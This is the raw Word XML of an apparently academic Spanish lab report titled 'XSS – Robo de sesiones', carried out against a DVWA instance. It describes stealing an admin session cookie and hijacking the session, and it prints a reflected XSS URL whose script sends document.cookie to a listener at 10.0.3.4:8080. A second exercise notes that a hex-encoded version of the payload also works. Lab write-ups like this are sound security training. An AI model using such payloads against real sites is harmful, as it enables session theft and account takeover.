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A65053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317D6E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9F6A634" w:rsidR="00CB23ED" w:rsidRDefault="00DA6B1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CA506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="00CA506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R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9F6A634" w:rsidR="00CB23ED" w:rsidRDefault="00DA6B1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CA506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CA506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R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A290DF9" w14:textId="24B6FB58" w:rsidR="00CA506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1704" w:history="1">
            <w:r w:rsidR="00CA506D" w:rsidRPr="00A10F1D">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
              </w:rPr>
              <w:t>XSS – Cross Site Scripting</w:t>
            </w:r>
            <w:r w:rsidR="00CA506D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00CA506D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00CA506D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc158221704 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00CA506D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00D178A8">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>¡Error! Marcador no definido.</w:t>
            </w:r>
            <w:r w:rsidR="00CA506D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="786774CE" w14:textId="140A11A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1075A585" w14:textId="3029E111" w:rsidR="00471037" w:rsidRDefault="00317D6E" w:rsidP="00317D6E">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>XSS – Robo de sesiones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653E7A6B" w14:textId="77777777" w:rsidR="00317D6E" w:rsidRDefault="00317D6E" w:rsidP="00317D6E"/>
    <w:p w14:paraId="65151BF9" w14:textId="6D1ACD9F" w:rsidR="00317D6E" w:rsidRPr="00317D6E" w:rsidRDefault="00317D6E" w:rsidP="00317D6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejercicio 1: Con XSS reflejado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094A850A" w14:textId="24E01D44" w:rsidR="00317D6E" w:rsidRDefault="00DA6B11" w:rsidP="00317D6E">
      <w:r>
        <w:t>Primero accedemos en incognito con el usuario 1337:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695F188C" w14:textId="696A3536" w:rsidR="00DA6B11" w:rsidRDefault="00DA6B11" w:rsidP="00317D6E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A885B12" wp14:editId="4C1A7E15">
            <wp:extent cx="1666875" cy="885825"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1256068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68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3E9E" w14:textId="0978C1EE" w:rsidR="00DA6B11" w:rsidRDefault="00C05659" w:rsidP="00317D6E">
      <w:r>
        <w:t>Ponemos el puerto en escucha</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415E8853" w14:textId="61364A7A" w:rsidR="00DA6B11" w:rsidRDefault="00DA6B11" w:rsidP="00317D6E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AD4079A" wp14:editId="60F0475A">
            <wp:extent cx="5400040" cy="1657985"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1209550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0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40E" w14:textId="6E052F5A" w:rsidR="001D5671" w:rsidRDefault="001D5671" w:rsidP="00317D6E">
      <w:r>
        <w:t>Ahora nos conectamos con otro navegador como admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24079569" w14:textId="162EE76B" w:rsidR="001D5671" w:rsidRDefault="001D5671" w:rsidP="00317D6E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2070AEB1" wp14:editId="59FA3F13">
            <wp:extent cx="5400040" cy="1423670"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="8593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2F0" w14:textId="75D5E811" w:rsidR="00C05659" w:rsidRDefault="00C05659" w:rsidP="00317D6E">
      <w:r>
        <w:t>Ahora ponemos aquí las cookie obtenidas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4690CCBF" w14:textId="66A6A62F" w:rsidR="00C05659" w:rsidRDefault="00C05659" w:rsidP="00317D6E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22424DD1" wp14:editId="5353988C">
            <wp:extent cx="5400040" cy="966470"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="129246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3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7B03" w14:textId="51C41737" w:rsidR="00C05659" w:rsidRDefault="00C05659" w:rsidP="00317D6E">
      <w:r>
        <w:t>Y al recargar la página vemos que somos admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363BDC6D" w14:textId="3AB40016" w:rsidR="00C05659" w:rsidRDefault="00C05659" w:rsidP="00317D6E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26743172" wp14:editId="04EAEA12">
            <wp:extent cx="3421380" cy="2325846"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="162967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0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333" w14:textId="77777777" w:rsidR="00C05659" w:rsidRDefault="00C05659" w:rsidP="00317D6E"/>
    <w:p w14:paraId="407AB164" w14:textId="071A61F7" w:rsidR="00C05659" w:rsidRDefault="00C05659" w:rsidP="00317D6E">
      <w:r>
        <w:t>El</w:t>
      </w:r>
      <w:r w:rsidR="00DB5F73">
        <w:t>la url que he usado</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ha sido:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D6D4C0" w14:textId="09A805C5" w:rsidR="009D5C95" w:rsidRDefault="009D5C95" w:rsidP="00317D6E">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="002266F5">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://10.0.3.7/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3E++new+Image%28%29.src%3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> D</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5C95">
        <w:t>%22http%3A%2F%2F10.0.3.4%3A8080%3Fcookie%3D%22%2Bdocument.cookie+%3C%2Fscri</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="009D5C95">
        <w:t>t%3E#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CF743A" w14:textId="70EB569D" w:rsidR="00317D6E" w:rsidRPr="00317D6E" w:rsidRDefault="00317D6E" w:rsidP="00317D6E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00317D6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ejercicio 2: Inyección en hexadecimal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21493A90" w14:textId="39E1F0FA" w:rsidR="001C4DB9" w:rsidRDefault="00E06A03" w:rsidP="00186714">
      <w:r>
        <w:t>Ahora he cogido desde name= hasta el final del script y lo he pasado en hexadecimal, despues he juntado todo y me sigue funcionando</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE98212" w14:textId="790CECE4" w:rsidR="00E06A03" w:rsidRPr="008616BF" w:rsidRDefault="00E06A03" w:rsidP="00186714">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FE8DFD5" wp14:editId="73AF2379">
            <wp:extent cx="5400040" cy="2694940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1126136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6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A03" w:rsidRPr="008616BF" w:rsidSect="00EA74F3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4E2B" w14:textId="77777777" w:rsidR="00EA74F3" w:rsidRDefault="00EA74F3" w:rsidP="00CB23ED">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="34BB5905" w14:textId="77777777" w:rsidR="00EA74F3" w:rsidRDefault="00EA74F3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4ECE" w14:textId="77777777" w:rsidR="00EA74F3" w:rsidRDefault="00EA74F3" w:rsidP="00CB23ED">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7C6DB16A" w14:textId="77777777" w:rsidR="00EA74F3" w:rsidRDefault="00EA74F3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7F81"/>
    <w:rsid w:val="00080489"/>
    <w:rsid w:val="000C631F"/>
    <w:rsid w:val="000D28E0"/>
    <w:rsid w:val="00104DF8"/>
    <w:rsid w:val="001154D7"/>
    <w:rsid w:val="00133EFD"/>
    <w:rsid w:val="00186714"/>
    <w:rsid w:val="001B0720"/>
    <w:rsid w:val="001C4DB9"/>
    <w:rsid w:val="001D355C"/>
    <w:rsid w:val="001D5671"/>
    <w:rsid w:val="00230D4D"/>
    <w:rsid w:val="00236CD1"/>
    <w:rsid w:val="0024098A"/>
    <w:rsid w:val="0025087E"/>
    <w:rsid w:val="00271463"/>
    <w:rsid w:val="00291482"/>
    <w:rsid w:val="002C48C6"/>
    <w:rsid w:val="00317D6E"/>
    <w:rsid w:val="00354167"/>
    <w:rsid w:val="00371E4D"/>
    <w:rsid w:val="003C3D9D"/>
    <w:rsid w:val="003F6E81"/>
    <w:rsid w:val="00430A89"/>
    <w:rsid w:val="00434FA9"/>
    <w:rsid w:val="00471037"/>
    <w:rsid w:val="004728DE"/>
    <w:rsid w:val="004B387C"/>
    <w:rsid w:val="004C0959"/>
    <w:rsid w:val="004C7903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6518"/>
    <w:rsid w:val="00721088"/>
    <w:rsid w:val="00730E0E"/>
    <w:rsid w:val="00735620"/>
    <w:rsid w:val="00791643"/>
    <w:rsid w:val="007B6E30"/>
    <w:rsid w:val="007C400C"/>
    <w:rsid w:val="007F116A"/>
    <w:rsid w:val="00811C98"/>
    <w:rsid w:val="008616BF"/>
    <w:rsid w:val="008920FD"/>
    <w:rsid w:val="008B3038"/>
    <w:rsid w:val="008E3DA7"/>
    <w:rsid w:val="009525CB"/>
    <w:rsid w:val="00996035"/>
    <w:rsid w:val="009D5C95"/>
    <w:rsid w:val="00A74E47"/>
    <w:rsid w:val="00AC131E"/>
    <w:rsid w:val="00AC4271"/>
    <w:rsid w:val="00AF3A20"/>
    <w:rsid w:val="00B21E5E"/>
    <w:rsid w:val="00B44A2A"/>
    <w:rsid w:val="00B8664F"/>
    <w:rsid w:val="00C05659"/>
    <w:rsid w:val="00C0695F"/>
    <w:rsid w:val="00C20286"/>
    <w:rsid w:val="00C203F7"/>
    <w:rsid w:val="00CA506D"/>
    <w:rsid w:val="00CB1298"/>
    <w:rsid w:val="00CB23ED"/>
    <w:rsid w:val="00CE74B5"/>
    <w:rsid w:val="00D1538E"/>
    <w:rsid w:val="00D178A8"/>
    <w:rsid w:val="00D64167"/>
    <w:rsid w:val="00D75DF0"/>
    <w:rsid w:val="00DA6B11"/>
    <w:rsid w:val="00DB5F73"/>
    <w:rsid w:val="00DC2F8E"/>
    <w:rsid w:val="00E06A03"/>
    <w:rsid w:val="00E14065"/>
    <w:rsid w:val="00E255C0"/>
    <w:rsid w:val="00E26513"/>
    <w:rsid w:val="00E57BA5"/>
    <w:rsid w:val="00EA74F3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0.0.3.7/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3E++new+Image%28%29.src%25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14D84"/>
    <w:rsid w:val="003E7994"/>
    <w:rsid w:val="00435685"/>
    <w:rsid w:val="00500790"/>
    <w:rsid w:val="005B61A9"/>
    <w:rsid w:val="005D7821"/>
    <w:rsid w:val="0063047C"/>
    <w:rsid w:val="00663157"/>
    <w:rsid w:val="007343AD"/>
    <w:rsid w:val="008B0FDE"/>
    <w:rsid w:val="008B4503"/>
    <w:rsid w:val="0098660E"/>
    <w:rsid w:val="00A120B2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8</dc:subject>
  <dc:creator>Carlos Diaz Montes</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Carlos Diaz Montes</cp:lastModifiedBy>
  <cp:revision>41</cp:revision>
  <cp:lastPrinted>2024-02-15T16:50:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-04T16:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-15T16:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>